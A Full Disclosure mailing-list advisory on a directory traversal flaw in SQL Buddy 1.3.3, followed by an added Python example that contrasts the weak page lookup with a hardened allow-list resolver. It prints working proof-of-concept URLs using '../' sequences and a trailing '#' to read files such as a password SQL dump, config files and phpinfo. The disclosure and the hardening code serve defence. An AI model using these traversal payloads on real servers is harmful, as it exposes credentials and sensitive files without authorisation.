Message-ID: <CANjdR3SgxQ6rabwp7xx-2Pfjb+3G+v_phur0G_-TKYkeTQCPgA@mail.gmail.com>
Date: Sat, 9 May 2015 18:57:42 -0400
From: John Page <hyp3rlinx@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Sqlbuddy Path Traversal Vulnerability
Read arbitrary server files:
Affected Vendor:
www.sqlbuddy.com
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source:
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product:
SQL Buddy 1.3.3. SQL Buddy is an open-source, web-based MySQL
administration application.
Advisory Information:
==============================
SQL Buddy suffers from a directory traversal: a user can walk up out of
the application directory and read any file, PHP or not, by appending
the '#' hash character to the file name requested via the URL
(e.g. .doc, .txt, .xml, .conf, .sql, etc.).
The trailing '#' acts as a delimiter that defeats the '.php' extension
SQL Buddy concatenates onto page names it requests via the POST method,
so the named non-PHP file is returned and rendered instead of <name>.php.
Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>
POC exploits:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#
2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#
3-Read phpinfo (no trailing '#' needed, since phpinfo is already a PHP file, so the appended .php extension fits):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo
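Added example (not SQL Buddy's code and not part of the original advisory): a Python model of the page-lookup pattern the advisory describes, a page name taken from the request with '.php' appended and no validation, beside a hardened resolver that refuses the PoC values above. The install path, function names and the allow-list regex are assumptions for illustration; the weak model covers only the '../' traversal and does not model how the trailing '#' strips the suffix. The hardened resolver rejects '/', '.' and '#' up front by allowing only [A-Za-z0-9_] page names, then confirms with realpath that the resolved file still lies inside the application directory, so both the traversal and the delimiter trick are refused before any file is opened.

```python
import os
import re

# Assumed allow-list shape for a page name: letters, digits, underscore only.
# This rejects '/', '.', '\' and '#' before any path is ever built.
PAGE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")


def vulnerable_include_path(base_dir: str, page: str) -> str:
    """Model (an assumption, not SQL Buddy's own code) of the weak pattern the
    advisory describes: the request's page value is concatenated with '.php'
    and used as a file path with no validation, so '../' walks out of base_dir.
    The trailing '#' delimiter trick is not modelled here."""
    return os.path.normpath(os.path.join(base_dir, page + ".php"))


def escapes_base(base_dir: str, path: str) -> bool:
    """True when path resolves outside base_dir, i.e. what a traversal achieves."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(path)
    return os.path.commonpath([base, target]) != base


def safe_include_path(base_dir: str, page: str) -> str:
    """Hardened resolver: allow-list the name first, then confirm containment."""
    if not PAGE_NAME.fullmatch(page):
        raise ValueError(f"rejected page name: {page!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    # Belt and braces: even a name that passes the regex must stay under base.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"page resolves outside the application directory: {candidate}")
    return candidate


def is_accepted(base_dir: str, page: str) -> bool:
    """Convenience wrapper: does the hardened resolver accept this page value?"""
    try:
        safe_include_path(base_dir, page)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    BASE = "/var/www/htdocs/sqlbuddy"  # constructed example install path
    # Page values taken from the advisory's PoC URLs, plus a benign one.
    for page in ("home", "../../../restricted/user_pwd.sql#",
                 "../../../../xampp/phpinfo", "home#"):
        weak = vulnerable_include_path(BASE, page)
        print(f"{page!r:40} weak -> {weak}  escapes={escapes_base(BASE, weak)}  "
              f"hardened accepts={is_accepted(BASE, page)}")
```

The containment check is deliberately kept even though the regex alone already blocks every PoC value: the regex documents intent, while the realpath comparison catches anything that slips past a later, looser edit of the allow-list (for example a symlinked page file pointing outside the tree).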
Disclosure Timeline:
==================================
Vendor Notification N/A
May 9, 2015: Public Disclosure - hyp3rlinx
Exploitation Technique:
=======================
Create a test file with a non-.php extension somewhere under htdocs, then
request it through the page fragment in a browser:
http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt#
Note that everything after the first '#' is a URL fragment, which a browser
never sends to the server; the application's client-side code reads it and
issues the POST. Fetching the URL verbatim with a command-line HTTP client
therefore proves nothing, so verify from a browser.
Severity Level:
===============
High
Description:
==========================
Request Method(s):
[+] POST
Vulnerable Product:
[+] sqlbuddy 1.3.3
Vulnerable Parameter(s):
[+] #page=[somefile]
Affected Area(s):
[+] Server directories & sensitive files
===============================
(hyp3rlinx)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/